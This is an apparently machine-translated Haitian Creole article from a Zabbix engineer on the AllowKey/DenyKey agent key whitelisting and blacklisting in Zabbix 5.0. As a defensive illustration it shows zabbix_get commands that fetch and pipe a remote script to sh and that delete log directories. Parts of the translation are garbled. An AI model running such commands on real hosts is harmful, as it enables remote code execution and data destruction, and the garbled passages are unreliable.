Lis nwa ak lis blan sipò pou mezi ajan-bò
Tikhon Uskov, Entegrasyon Enjenyè, Zabbix
Pwoblèm sekirite done yo
Zabbix 5.0 gen yon nouvo karakteristik ki pèmèt ou amelyore sekirite nan sistèm lè l sèvi avèk Zabbix Agent epi ranplase ansyen paramèt la. EnableRemoteCommands.
Amelyorasyon nan sekirite sistèm ajan ki baze sou soti nan lefèt ke yon ajan ka fè yon gwo kantite aksyon potansyèlman danjere.
- Ajan an ka kolekte prèske nenpòt enfòmasyon, ki gen ladan enfòmasyon konfidansyèl oswa potansyèlman danjere, ki soti nan dosye konfigirasyon, dosye log, dosye modpas, oswa nenpòt lòt dosye.
Pou egzanp, lè l sèvi avèk sèvis piblik zabbix_get ou ka jwenn aksè nan yon lis itilizatè yo, anyè lakay yo, dosye modpas, elatriye.
Aksè done lè l sèvi avèk sèvis piblik zabbix_get
REMAK. Done yo ka sèlman rekipere si ajan an te li otorizasyon sou dosye ki koresponn lan. Men, pou egzanp, dosye a /etc/passwd/ lizib pou tout itilizatè.
- Ajan an ka egzekite kòmandman ki kapab danjere tou. Pa egzanp, kle *system.run[]** pèmèt ou egzekite nenpòt kòmandman aleka sou nĹuds rezo a, ki gen ladan kouri script soti nan koòdone wèb Zabbix ki tou egzekite kòmandman sou bò ajan an.
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]- Sou Linux, ajan an kouri pa default san privilèj rasin, pandan y ap sou Windows li kouri kòm yon sèvis kòm Sistèm epi li gen aksè san restriksyon nan sistèm nan dosye. An konsekans, si pa gen okenn chanjman ki fèt nan paramèt Zabbix Agent apre enstalasyon an, ajan an gen aksè a rejis la, sistèm fichye epi li ka egzekite demann WMI.
Nan vèsyon pi bonè paramèt la EnableRemoteCommands=0 pèmèt sèlman enfim mezi ak kle a *system.run[]** ak kouri scripts soti nan koòdone entènèt la, men pa te gen okenn fason yo mete restriksyon sou aksè nan dosye endividyèl, pèmèt oswa enfim kle endividyèl ki te enstale ak ajan an, oswa limite itilizasyon paramèt endividyèl yo.
Sèvi ak paramèt EnableRemoteCommand nan vèsyon pi bonè nan Zabbix
AllowKey/DenyKey
Zabbix 5.0 ede pwoteje kont aksè san otorizasyon sa yo lè li bay lis blan ak lis nwa pou pèmèt ak refize mezi sou bò ajan yo.
Nan Zabbix 5.0 tout kle, ki gen ladan *system.run[]** yo aktive, epi de nouvo opsyon konfigirasyon ajan yo te ajoute:
AllowKey= â chèk otorize;
DenyKey= â chèk entèdi;
kote se yon modèl non kle ak paramèt ki sèvi ak metakaraktè (*).
Kle AllowKey ak DenyKey pèmèt ou pèmèt oswa refize mezi endividyèl ki baze sou yon modèl espesifik. Kontrèman ak lòt paramèt konfigirasyon, kantite paramèt AllowKey/DenyKey pa limite. Sa a pèmèt ou defini klèman ki sa egzakteman ajan an ka fè nan sistèm nan pa kreye yon pye bwa nan chèk - kle ègzèkutabl, kote lòd la nan ki yo ekri jwe yon wòl trè enpòtan.
Sekans règ yo
Règ yo tcheke nan lòd yo antre nan dosye konfigirasyon an. Kle a tcheke dapre règ yo anvan premye match la, epi le pli vit ke kle nan eleman done a matche ak modèl la, li pèmèt oswa refize. Apre sa, tcheke règ sispann epi rès kle yo inyore.
Se poutèt sa, si yon eleman matche ak yon règ pèmèt ak yon refize, rezilta a pral depann de ki règ ki premye nan dosye a konfigirasyon.
2 règ diferan ak menm modèl la ak yon kle vfs.file.size[/tmp/file]
Lòd pou itilize kle AllowKey/DenyKey:
- règ egzak,
- règ jeneral,
- règ entèdiksyon.
Pou egzanp, si ou bezwen aksè nan dosye nan yon katab sèten, ou dwe premye pèmèt aksè a yo, ak Lè sa a, refize tout lòt bagay ki pa tonbe nan otorizasyon yo etabli. Si yo itilize règ refize an premye, yo pral refize aksè nan katab la.
Sekans kòrèk
Si ou bezwen pèmèt 2 sèvis piblik yo kouri atravè *system.run[]**, epi yo pral espesifye règ la refize an premye, sèvis piblik yo pa pral lanse, paske premye modèl la ap toujou matche ak nenpòt kle, epi règ ki vin apre yo pral inyore.
Sekans ki pa kòrèk
Modèl
Règ fondamantal
Modèl se yon ekspresyon ak joker. Metakaraktè (*) matche ak nenpòt ki kantite karaktè nan yon pozisyon espesifik. Metakaraktè yo ka itilize tou de nan non kle a ak nan paramèt. Pou egzanp, ou ka entèdi defini premye paramèt la ak tèks, epi presize youn ki vin apre a kòm wildcard.
Paramèt yo dwe fèmen nan parantèz kare [].
system.run[*- kòrèkvfs.file*.txt]- kòrèkvfs.file.*[*]- dwat
Egzanp yo sèvi ak wildcard.
- Nan non kle a ak nan paramèt la. Nan ka sa a, kle a pa koresponn ak yon kle menm jan an ki pa gen yon paramèt, depi nan modèl la nou endike ke nou vle resevwa yon sèten fen nan non kle a ak yon seri sèten paramèt.
- Si modèl la pa sèvi ak parantèz kare, modèl la pèmèt tout kle ki pa gen paramèt epi li refize tout kle ki gen paramèt espesifye a.
- Si kle a ekri an antye epi paramèt yo espesifye kòm wildcard, li pral matche ak nenpòt kle ki sanble ak nenpòt paramèt epi yo pa pral matche ak kle a san parantèz kare, sa vle di li pral pèmèt oswa refize.
Règ pou ranpli paramèt yo.
- Si yo gen entansyon itilize yon kle ki gen paramèt, yo dwe espesifye paramèt yo nan dosye konfigirasyon an. Paramèt yo dwe espesifye kòm yon metakaraktè. Li nesesè ak anpil atansyon refize aksè nan nenpòt ki dosye epi pran an kont ki enfòmasyon metrik la ka bay anba diferan òtograf - avèk ak san paramèt.
Karakteristik nan ekri kle ak paramèt
- Si yo espesifye yon kle ak paramèt, men paramèt yo opsyonèl epi espesifye kòm yon metakaraktè, yon kle san paramèt yo pral rezoud. Pou egzanp, si ou vle enfim resevwa enfòmasyon sou chaj la sou CPU a epi presize ke system.cpu.load[*] kle a ta dwe enfim, pa bliye ke kle a san paramèt ap retounen valè chaj mwayèn.
Règ pou ranpli paramèt yo
Nòt
ajisteman
- Gen kèk règ ki pa ka chanje pa itilizatè a, pou egzanp, règ dekouvèt oswa règ oto-enskripsyon ajan. Règ AllowKey/DenyKey pa afekte paramèt sa yo:
- HostnameItem
- HostMetadataItem
- HostInterfaceItem
REMAK. Si yon administratè enfim yon kle, lè yo mande, Zabbix pa bay enfòmasyon sou poukisa metrik la oswa kle a tonbe nan kategori '.PA SIPĂTE'. Enfòmasyon sou entèdiksyon sou egzekite kòmandman aleka yo pa parèt tou nan dosye ajan yo. Sa a se pou rezon sekirite, men li ka konplike debogaj si paramèt yo tonbe nan yon kategori ki pa sipòte pou kèk rezon..
- Ou pa ta dwe konte sou okenn lòd espesifik pou konekte fichye konfigirasyon ekstèn (pa egzanp, nan lòd alfabetik).
Itilite Liy Kòmand
Apre mete règleman yo, ou bezwen asire w ke tout bagay se configurÊ kòrèkteman.
Ou ka itilize youn nan twa opsyon:
- Ajoute yon metrik nan Zabbix.
- Tès ak zabbix_agentd. Zabbix ajan ak opsyon -enprime (-p) montre tout kle (ki pèmèt yo pa default) eksepte sa yo ki pa pèmèt pa konfigirasyon an. Ak opsyon an -tès (-t) pou yon kle entèdi ap retounen 'Kle atik ki pa sipòte'.
- Tès ak zabbix_get. Itilite zabbix_get ak opsyon -k pral retounen 'ZBX_NOTSUPPORTED: Enkoni mezi'.
Pèmèt oswa refize
Ou ka refize aksè nan yon dosye epi verifye, pou egzanp, lè l sèvi avèk sèvis piblik la zabbix_getke yo refize aksè nan dosye a.
**
REMAK. Quotes nan paramèt yo inyore.
Nan ka sa a, aksè nan yon dosye sa yo ka pèmèt atravè yon chemen diferan. Pou egzanp, si yon lyen senbolik mennen nan li.
Li rekòmande yo tcheke opsyon divès kalite pou aplike règ yo espesifye, epi tou pran an kont posiblite yo pou kontourne entèdiksyon yo.
Kesyon ak Repons
Kesyon. Poukisa yo te chwazi yon modèl konplèks konsa ak pwòp lang li pou dekri règ, otorizasyon ak entèdiksyon? Poukisa li pa t posib pou yo itilize, pa egzanp, ekspresyon regilye ke Zabbix itilize yo?
Reponn. Sa a se yon pwoblèm pèfòmans regex paske anjeneral gen yon sèl ajan epi li tcheke yon gwo kantite mezi. Regex se byen yon operasyon lou epi nou pa ka tcheke dè milye de metrik nan fason sa a. Wildcards - yon solisyon inivèsèl, lajman itilize ak senp.
Kesyon. Ăske yo pa enkli dosye yo nan lòd alfabetik?
Reponn. Jan mwen konnen, li se nòmalman enposib predi lòd nan ki règ yo pral aplike si ou gaye règ yo nan diferan dosye. Mwen rekòmande pou kolekte tout règ AllowKey/DenyKey nan yon sèl Fichye enkli, paske yo kominike youn ak lòt, epi enkli dosye sa a..
Kesyon. Nan Zabbix 5.0 opsyon a 'EnableRemoteCommands=' manke nan dosye konfigirasyon an, epi sèlman AllowKey/DenyKey ki disponib?
Repons. Wi se vre.
Mèsi pou atansyon ou!
Sous: www.habr.com
